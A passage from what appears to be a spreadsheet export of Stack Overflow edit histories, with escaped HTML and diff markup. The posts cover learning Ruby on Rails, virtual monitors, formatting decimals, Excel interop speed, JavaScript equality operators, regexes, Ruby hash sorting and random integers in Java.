 &lt;p&gt; Should I maybe just wait for more RoR 2.0 tutorials to come out before attempting to learn RoR? Or should I just plow on through and experiment until I figure it out?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; So like many people, I'm excited about Ruby on Rails. Being a Windows user, I downloaded InstantRails, got it going, and followed along with the screencast on how to make a blog with RoR 2.0 in fifteen minutes. I used Notepad++ as my text editor, because that's what I've traditionally used for writing the PHP-based websites I've done in the past. I was a little envious of Mac users and how they get the really attractive-looking TextMate, but I managed to follow through the entire screencast and get everything working smoothly.&lt;/p&gt; _x000D_
 &lt;p&gt; However, I was lost most of the time.&lt;/p&gt; _x000D_
 &lt;p&gt; I know plenty of programming and scripting languages over the years - C++, JavaScript, PHP, HTML, and Lua just to name a few. I don't know Ruby, but I understand a lot of how it works, as far as the syntax is concerned, but I don't understand a lot of the logic behind why certain files do certain things, and that sort of thing.&lt;/p&gt; _x000D_
 &lt;p&gt; Also, I tried Aptana with RadRails, but found it difficult to set up. Is there any concrete tutorial for getting it set up and working fully with Ruby on Rails 2.0?&lt;/p&gt; _x000D_
 &lt;p&gt; Should I maybe just wait for more RoR 2.0 tutorials to come out before attempting to learn RoR? Or should I just plow on through and experiment until I figure it out?&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; EDIT: Editing solely to get the badge. &amp;gt;_&amp;gt;&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Adam Rezich</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Like most developers I have grown to love dual monitors. I won't go into all the reasons for their goodness; just take it as a given.&lt;/p&gt; _x000D_
 &lt;p&gt; However, they are not perfect. You can never seem to line them up "just right". You always end up with the monitors at slight funny angles. And of course the bezel always gets in the way. And this is with identical monitors. The problem is much worse with different monitors -- VMWare's multi monitor feature won't even work with monitors of differnt resolutions.&lt;/p&gt; _x000D_
 &lt;p&gt; When you use multiple monnitors, one of them becomes your primary monitor of focus. Your focus may flip from one monitor to the other, but at any point in time you are usually focusing on only one monitor. There are exceptions to this (WinDiff, Excel), but this is generally the case. I suggest that having a single large monitor with all the benefits of multiple smaller monitors would be a better solution.&lt;/p&gt; _x000D_
 &lt;p&gt; Wide screen monitors are fantastic, but it is hard to use all the space efficiently. If you are writing code you are generally working on the left-hand side of the window. If you maximize an editor on a wide-screen monitor the right-hand side of the window will be a sea of white. Programs like WinSplit Revolution will help to organise your windows, but this is really just addressing the symptom, not the problem. Even with WinSplit Revolution, when you maximise a window it will take up the whole screen. You can't lock a window into a specific section of the screen.&lt;/p&gt; _x000D_
 &lt;p&gt; This is where virtual monitors comes in.&lt;/p&gt; _x000D_
 &lt;p&gt; What would be really nice is a video driver that sits on top of the existing driver, but allows a single monitor to be virtualised into multiple monitors. Control Panel would see your single physical monitor as two or more virtual monitors. The software could even support a virtual bezel to emphasise what is happening, or you could opt for seamless mode. Programs like WinSplit Revolution and UltraMon would still work. This virtual video driver would allow you to slice &amp;amp; dice your physical monitor into as many virtual monitors as you want.&lt;/p&gt; _x000D_
 &lt;p&gt; Does anybody know if such software exists? If not, are there any budding Windows display driver guru's out there willing to take up the challenge?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Like most developers I have grown to love dual monitors. I won't go into all the reasons for their goodness; just take it as a given.&lt;/p&gt; _x000D_
 &lt;p&gt; However, they are not perfect. You can never seem to line them up "just right". You always end up with the monitors at slight funny angles. And of course the bezel always gets in the way. And this is with identical monitors. The problem is much worse with different monitors -- VMWare's multi monitor feature won't even work with monitors of differnt resolutions.&lt;/p&gt; _x000D_
 &lt;p&gt; When you use multiple monnitors, one of them becomes your primary monitor of focus. Your focus may flip from one monitor to the other, but at any point in time you are usually focusing on only one monitor. There are exceptions to this (WinDiff, Excel), but this is generally the case. I suggest that having a single large monitor with all the benefits of multiple smaller monitors would be a better solution.&lt;/p&gt; _x000D_
 &lt;p&gt; Wide screen monitors are fantastic, but it is hard to use all the space efficiently. If you are writing code you are generally working on the left-hand side of the window. If you maximize an editor on a wide-screen monitor the right-hand side of the window will be a sea of white. Programs like WinSplit Revolution will help to organise your windows, but this is really just addressing the symptom, not the problem. Even with WinSplit Revolution, when you maximise a window it will take up the whole screen. You can't lock a window into a specific section of the screen.&lt;/p&gt; _x000D_
 &lt;p&gt; This is where virtual monitors comes in.&lt;/p&gt; _x000D_
 &lt;p&gt; What would be really nice is a video driver that sits on top of the existing driver, but allows a single monitor to be virtualised into multiple monitors. Control Panel would see your single physical monitor as two or more virtual monitors. The software could even support a virtual bezel to emphasise what is happening, or you could opt for seamless mode. Programs like WinSplit Revolution and UltraMon would still work. This virtual video driver would allow you to slice &amp;amp; dice your physical monitor into as many virtual monitors as you want.&lt;/p&gt; _x000D_
 &lt;p&gt; Does anybody know if such software exists? If not, are there any budding Windows display driver guru's out there willing to take up the challenge?&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; I am not after the myriad of virtual desktop/window manager programs that are available. I get frustrated with these programs. They seem good at first but they usually have some strange behaviour and don't work well with other programs (such as WinSplit Revolution).&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; I want the real thing!&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Mike Thompson</t>
  </si>
  <si>
    <t>Jay Bazuzi</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I've got some entities which have decimal properties on them. These entities' properties are displayed in multiple places throughout my UI.&lt;/p&gt; _x000D_
 &lt;p&gt; Currently I'm finding myself doing:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;litWeight.Text = person.Weight.ToString("0.00");_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;Now&lt;/span&gt; I know for a fact that in several instances, and am suspicious of many others that the client is likely to want the values to 3d.p. in the future.&lt;/p&gt; _x000D_
 &lt;p&gt; Is there some pattern I can employ to handle the formatting of this Weight property (and other properties; not just decimals, perhaps dates etc.) so that I can have this formatting in a single place?&lt;/p&gt; _x000D_
 &lt;p&gt; I know could use a formatstring in the webconfig, or write some extension methods in the UI but these don't seem very elegant solutions.&lt;/p&gt; _x000D_
 &lt;p&gt; It would be nice to have some formatting objects which are tied to my entities, so its inherently obvious which formatter to use.&lt;/p&gt; _x000D_
 &lt;p&gt; Thanks,&lt;/p&gt; _x000D_
 &lt;p&gt; Andrew&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I've got some entities which have decimal properties on them. These entities' properties are displayed in multiple places throughout my UI.&lt;/p&gt; _x000D_
 &lt;p&gt; Currently I'm finding myself doing:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;litWeight.Text = person.Weight.ToString("0.00");_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;all over the place. Now&lt;/span&gt; I know for a fact that in several instances, and am suspicious of many others that the client is likely to want the values to 3d.p. in the future.&lt;/p&gt; _x000D_
 &lt;p&gt; Is there some pattern I can employ to handle the formatting of this Weight property (and other properties; not just decimals, perhaps dates etc.) so that I can have this formatting in a single place?&lt;/p&gt; _x000D_
 &lt;p&gt; I know could use a formatstring in the webconfig, or write some extension methods in the UI but these don't seem very elegant solutions.&lt;/p&gt; _x000D_
 &lt;p&gt; It would be nice to have some formatting objects which are tied to my entities, so its inherently obvious which formatter to use.&lt;/p&gt; _x000D_
 &lt;p&gt; Thanks,&lt;/p&gt; _x000D_
 &lt;p&gt; Andrew&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Andrew Bullock</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Is there a quick and nice way &lt;span class="diff-delete"&gt;using &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;Linq&lt;/span&gt;&lt;/code&gt;?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Is there a quick and nice way &lt;span class="diff-add"&gt;with lambda expressions&lt;/span&gt;?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>AakashM</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I was wondering what I could do to improve the performance of Excel automation, as it can be quite slow if you have a lot going on in the worksheet...&lt;/p&gt; _x000D_
 &lt;p&gt; Here's a few I found myself:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;code&gt;ExcelApp.ScreenUpdating = false&lt;/code&gt; -- turn of the redrawing of the screen&lt;/p&gt; &lt;/li&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;code&gt;ExcelApp.Calculation = Excel.XlCalculation.xlCalculationManual&lt;/code&gt; -- turning of the calculation engine so Excel doesn't autotomatically recalculates when a cell value changes (turn it back on after you're done)&lt;/p&gt; &lt;/li&gt; _x000D_
  &lt;li&gt;&lt;p&gt; Reduce calls to &lt;code&gt;Worksheet.Cells.Item(row, col)&lt;/code&gt; and &lt;code&gt;Worksheet.Range&lt;/code&gt; -- I had to poll hundreds of cells to find the cell I needed. Implementing some caching of cell locations, reduced the execution time from ~40 to ~5 seconds.&lt;/p&gt; &lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; What kind of interop calls take a heavy toll on performance and should be avoided? What else &lt;span class="diff-delete"&gt;casn&lt;/span&gt; you do to avoid unnecessary processing being done?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I was wondering what I could do to improve the performance of Excel automation, as it can be quite slow if you have a lot going on in the worksheet...&lt;/p&gt; _x000D_
 &lt;p&gt; Here's a few I found myself:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;code&gt;ExcelApp.ScreenUpdating = false&lt;/code&gt; -- turn of the redrawing of the screen&lt;/p&gt; &lt;/li&gt; _x000D_
  &lt;li&gt;&lt;p&gt;&lt;code&gt;ExcelApp.Calculation = Excel.XlCalculation.xlCalculationManual&lt;/code&gt; -- turning of the calculation engine so Excel doesn't autotomatically recalculates when a cell value changes (turn it back on after you're done)&lt;/p&gt; &lt;/li&gt; _x000D_
  &lt;li&gt;&lt;p&gt; Reduce calls to &lt;code&gt;Worksheet.Cells.Item(row, col)&lt;/code&gt; and &lt;code&gt;Worksheet.Range&lt;/code&gt; -- I had to poll hundreds of cells to find the cell I needed. Implementing some caching of cell locations, reduced the execution time from ~40 to ~5 seconds.&lt;/p&gt; &lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; What kind of interop calls take a heavy toll on performance and should be avoided? What else &lt;span class="diff-add"&gt;can&lt;/span&gt; you do to avoid unnecessary processing being done?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Vincent Van Den Berghe</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Is a string actually a character array (is-a)&lt;span class="diff-delete"&gt;? Or&lt;/span&gt; does it have a character array as an internal store (has-a)&lt;span class="diff-delete"&gt;? Or&lt;/span&gt; is it's own object which can expose itself as a with an array of characters?&lt;/p&gt; _x000D_
 &lt;p&gt; I am more inclided to say it is it's own object, but then why are we so inclined to always say "A string is an array of characters..."?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Is a string actually a character array (is-a)&lt;span class="diff-add"&gt;, or&lt;/span&gt; does it have a character array as an internal store (has-a)&lt;span class="diff-add"&gt;, or&lt;/span&gt; is it's own object which can expose itself as a with an array of characters?&lt;/p&gt; _x000D_
 &lt;p&gt; I am more inclided to say it is it's own object, but then why are we so inclined to always say "A string is an array of characters..."?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Bob</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Someone on here recently recommended BWToolkit, and it really impressed me, so I started googling for more IB &lt;span class="diff-delete"&gt;plugins&lt;/span&gt;. I've found a couple on random blogs, but haven't been able to find any kind of repository/aggregator for them. Anyone know where I can find more of these?&lt;/p&gt; _x000D_
 &lt;p&gt; Thanks.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Someone on here recently recommended BWToolkit, and it really impressed me, so I started googling for more IB &lt;span class="diff-add"&gt;plug-ins&lt;/span&gt;. I've found a couple on random blogs, but haven't been able to find any kind of repository/aggregator for them. Anyone know where I can find more of these?&lt;/p&gt; _x000D_
 &lt;p&gt; Thanks.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Rich Catalano</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Does anyone know of any optimization packages out there for R (similar to NUOPT for S+&lt;span class="diff-delete"&gt; or SciPy in Python&lt;/span&gt;)&lt;/p&gt; _x000D_
 &lt;p&gt; Thanks&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Does anyone know of any optimization packages out there for R (similar to NUOPT for S+)&lt;/p&gt; _x000D_
 &lt;p&gt; Thanks&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>wcm</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm using &lt;a href="http://en.wikipedia.org/wiki/JSLint" rel="nofollow noreferrer"&gt;JSLint&lt;/a&gt; to go through JavaScript, and it's returning many suggestions to replace &lt;code&gt;==&lt;/code&gt; (two equals signs) with &lt;code&gt;===&lt;/code&gt; (three equals signs) when doing things like comparing &lt;code&gt;idSele_UNVEHtype.value.length == 0&lt;/code&gt; inside of an &lt;code&gt;if&lt;/code&gt; statement.&lt;span class="diff-delete"&gt;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lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Is there a performance benefit to replacing &lt;code&gt;==&lt;/code&gt; with &lt;code&gt;===&lt;/code&gt;?&lt;/p&gt; _x000D_
 &lt;p&gt; Any performance improvement would be welcomed as many comparison operators exist.&lt;/p&gt; _x000D_
 &lt;p&gt; If no type conversion takes place, would there be a performance gain over &lt;code&gt;==&lt;/code&gt;?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm using &lt;a href="http://en.wikipedia.org/wiki/JSLint" rel="nofollow noreferrer"&gt;JSLint&lt;/a&gt; to go through JavaScript, and it's returning many suggestions to replace &lt;code&gt;==&lt;/code&gt; (two equals signs) with &lt;code&gt;===&lt;/code&gt; (three equals signs) when doing things like comparing &lt;code&gt;idSele_UNVEHtype.value.length == 0&lt;/code&gt; inside of an &lt;code&gt;if&lt;/code&gt; statement.&lt;/p&gt; _x000D_
 &lt;p&gt; Is there a performance benefit to replacing &lt;code&gt;==&lt;/code&gt; with &lt;code&gt;===&lt;/code&gt;?&lt;/p&gt; _x000D_
 &lt;p&gt; Any performance improvement would be welcomed as many comparison operators exist.&lt;/p&gt; _x000D_
 &lt;p&gt; If no type conversion takes place, would there be a performance gain over &lt;code&gt;==&lt;/code&gt;?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; RegEx for the title:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;.*?&amp;lt;i&amp;gt;(&lt;span class="diff-delete"&gt;[^&amp;lt;]*&lt;/span&gt;)&lt;span class="diff-delete"&gt;&amp;lt;/i&amp;gt;&lt;/span&gt;.*           &lt;span class="diff-delete"&gt;[&lt;/span&gt; &lt;span class="diff-delete"&gt;]&lt;/span&gt; &lt;span class="diff-delete"&gt;g&lt;/span&gt;  [ ] s  [ ] m  [x] i_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; RegEx for the link:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;.*?href="([^"]*)&lt;span class="diff-delete"&gt;"&lt;/span&gt;.*           [ ] g  &lt;span class="diff-delete"&gt;[ ]&lt;/span&gt; s  [ ] m  [x] i_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Here is a nice web2.0-ish tool to test with: &lt;a href="http://gskinner.com/RegExr/" rel="nofollow noreferrer"&gt;RegExr&lt;/a&gt;. But for some reason it's still beta. ;-)&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; RegEx for the title:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;.*?&amp;lt;i&amp;gt;(&lt;span class="diff-add"&gt;[^&amp;gt;]*&lt;/span&gt;).*               [ ]&lt;span class="diff-add"&gt; g &lt;/span&gt; &lt;span class="diff-add"&gt;[x] &lt;/span&gt;s  [ ] m  [x] i_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; RegEx for the link:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;.*?href="([^"]*).*&lt;span class="diff-add"&gt; &lt;/span&gt;           [ ] g  &lt;span class="diff-add"&gt;[x]&lt;/span&gt; s  [ ] m  [x] i_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Here is a nice web2.0-ish tool to test with: &lt;a href="http://gskinner.com/RegExr/" rel="nofollow noreferrer"&gt;RegExr&lt;/a&gt;. But for some reason it's still beta. ;-)&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Hashes in Ruby can't be sorted (at least not before 1.9)&lt;/p&gt; _x000D_
 &lt;p&gt; This means that looping through a Hash won't necessarily yield the information in the right order for you. However, it's trivial to loop through Hashed data in a particular order by converting it to an Array first, and in fact calling the sort methods on a Hash will convert it into an Array for you:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;gt;&amp;gt; { :a =&amp;gt; 4, :b =&amp;gt; 12, :c =&amp;gt; 3, :d =&amp;gt; 8 }.sort_by { |key, value| value }_x000D_
=&amp;gt; [[:c, 3], [:a, 4], [:d, 8], [:b, 12]]_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; So in your case&lt;span class="diff-delete"&gt; (in Ruby 1.8)&lt;/span&gt;:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;hsh&lt;span class="diff-delete"&gt;.to_a&lt;/span&gt;.sort_by {|key, ratings| ratings[:rating] }_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Hashes in Ruby can't be sorted (at least not before 1.9)&lt;/p&gt; _x000D_
 &lt;p&gt; This means that looping through a Hash won't necessarily yield the information in the right order for you. However, it's trivial to loop through Hashed data in a particular order by converting it to an Array first, and in fact calling the sort methods on a Hash will convert it into an Array for you:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&amp;gt;&amp;gt; { :a =&amp;gt; 4, :b =&amp;gt; 12, :c =&amp;gt; 3, :d =&amp;gt; 8 }.sort_by { |key, value| value }_x000D_
=&amp;gt; [[:c, 3], [:a, 4], [:d, 8], [:b, 12]]_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; So in your case:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;hsh.sort_by {|key, ratings| ratings[:rating] }_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;int random = minimum + Double.valueOf(&lt;span class="diff-delete"&gt;_x000D_
    ThreadLocalRandom.current()&lt;/span&gt;.&lt;span class="diff-delete"&gt;nextDouble&lt;/span&gt;()*(maximum-minimum)&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;).intValue();_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Or take a look to RandomUtils from &lt;a href="http://commons.apache.org/lang" rel="nofollow noreferrer"&gt;Apache Commons&lt;/a&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;int random = minimum + Double.valueOf(&lt;span class="diff-add"&gt;Math&lt;/span&gt;.&lt;span class="diff-add"&gt;random&lt;/span&gt;()*(maximum-minimum&lt;span class="diff-add"&gt; &lt;/span&gt;)).intValue();_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Or take a look to RandomUtils from &lt;a href="http://commons.apache.org/lang" rel="nofollow noreferrer"&gt;Apache Commons&lt;/a&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>leventov</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; You can edit your second code example to:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;Random rn = &lt;span class="diff-delete"&gt;ThreadLocalRandom.current&lt;/span&gt;();_x000D_
int range = maximum - minimum + 1;_x000D_
int randomNum =  rn.nextInt(range) + minimum;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; You can edit your second code example to:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;Random rn = &lt;span class="diff-add"&gt;new Random&lt;/span&gt;();_x000D_
int range = maximum - minimum + 1;_x000D_
int randomNum =  rn.nextInt(range) + minimum;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Note that this approach is more biased and less efficient than a &lt;code&gt;nextInt&lt;/code&gt; approach, &lt;a href="https://stackoverflow.com/a/738651/360211"&gt;https://stackoverflow.com/a/738651/360211&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; One standard pattern for accomplishing this is:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;Min + (int)(&lt;span class="diff-delete"&gt;ThreadLocalRandom.current()&lt;/span&gt;.&lt;span class="diff-delete"&gt;nextDouble&lt;/span&gt;() * ((Max - Min) + 1))_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; The &lt;a href="http://en.wikipedia.org/wiki/Java_%28programming_language%29" rel="nofollow noreferrer"&gt;Java&lt;/a&gt; &lt;code&gt;&lt;span class="diff-delete"&gt;Random.nextDouble()&lt;/span&gt;&lt;/code&gt; generates a double value in the range &lt;code&gt;[0,1)&lt;/code&gt;. Notice this range does not include the 1.&lt;/p&gt; _x000D_
 &lt;p&gt; In order to get a specific range of values first, you need to multiply by the magnitude of the range of values you want covered.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;ThreadLocalRandom.current()&lt;/span&gt;.&lt;span class="diff-delete"&gt;nextDouble&lt;/span&gt;() * ( Max - Min )_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; This returns a value in the range &lt;code&gt;[0,Max-Min)&lt;/code&gt;, where 'Max-Min' is not included.&lt;/p&gt; _x000D_
 &lt;p&gt; For example, if you want &lt;code&gt;[5,10)&lt;/code&gt;, you need to cover five integer values so you use&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;ThreadLocalRandom.current()&lt;/span&gt;.&lt;span class="diff-delete"&gt;nextDouble&lt;/span&gt;() * 5_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; This would return a value in the range &lt;code&gt;[0,5)&lt;/code&gt;, where 5 is not included.&lt;/p&gt; _x000D_
 &lt;p&gt; Now you need to shift this range up to the range that you are targeting. You do this by adding the Min value.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;Min + (&lt;span class="diff-delete"&gt;ThreadLocalRandom.current()&lt;/span&gt;.&lt;span class="diff-delete"&gt;nextDouble&lt;/span&gt;() * (Max - Min))_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; You now will get a value in the range &lt;code&gt;[Min,Max)&lt;/code&gt;. Following our example, that means &lt;code&gt;[5,10)&lt;/code&gt;:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;5 + (Math.random() * (10 - 5))_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; But, this still doesn't include &lt;code&gt;Max&lt;/code&gt; and you are getting a double value. In order to get the &lt;code&gt;Max&lt;/code&gt; value included, you need to add 1 to your range parameter &lt;code&gt;(Max - Min)&lt;/code&gt; and then truncate the decimal part by casting to an int. This is accomplished via:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;Min + (int)(&lt;span class="diff-delete"&gt;ThreadLocalRandom.current()&lt;/span&gt;.&lt;span class="diff-delete"&gt;nextDouble&lt;/span&gt;() * ((Max - Min) + 1))_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; And there you have it. A random integer value in the range &lt;code&gt;[Min,Max]&lt;/code&gt;, or per the example &lt;code&gt;[5,10]&lt;/code&gt;:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;5 + (int)(&lt;span class="diff-delete"&gt;ThreadLocalRandom.current()&lt;/span&gt;.&lt;span class="diff-delete"&gt;nextDouble&lt;/span&gt;() * ((10 - 5) + 1))_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Note that this approach is more biased and less efficient than a &lt;code&gt;nextInt&lt;/code&gt; approach, &lt;a href="https://stackoverflow.com/a/738651/360211"&gt;https://stackoverflow.com/a/738651/360211&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; One standard pattern for accomplishing this is:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;Min + (int)(&lt;span class="diff-add"&gt;Math&lt;/span&gt;.&lt;span class="diff-add"&gt;random&lt;/span&gt;() * ((Max - Min) + 1))_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; The &lt;a href="http://en.wikipedia.org/wiki/Java_%28programming_language%29" rel="nofollow noreferrer"&gt;Java&lt;/a&gt; &lt;span class="diff-add"&gt;Math library function Math.random()&lt;/span&gt; generates a double value in the range &lt;code&gt;[0,1)&lt;/code&gt;. Notice this range does not include the 1.&lt;/p&gt; _x000D_
 &lt;p&gt; In order to get a specific range of values first, you need to multiply by the magnitude of the range of values you want covered.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-add"&gt;Math&lt;/span&gt;.&lt;span class="diff-add"&gt;random&lt;/span&gt;() * ( Max - Min )_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; This returns a value in the range &lt;code&gt;[0,Max-Min)&lt;/code&gt;, where 'Max-Min' is not included.&lt;/p&gt; _x000D_
 &lt;p&gt; For example, if you want &lt;code&gt;[5,10)&lt;/code&gt;, you need to cover five integer values so you use&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-add"&gt;Math&lt;/span&gt;.&lt;span class="diff-add"&gt;random&lt;/span&gt;() * 5_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; This would return a value in the range &lt;code&gt;[0,5)&lt;/code&gt;, where 5 is not included.&lt;/p&gt; _x000D_
 &lt;p&gt; Now you need to shift this range up to the range that you are targeting. You do this by adding the Min value.&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;Min + (&lt;span class="diff-add"&gt;Math&lt;/span&gt;.&lt;span class="diff-add"&gt;random&lt;/span&gt;() * (Max - Min))_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
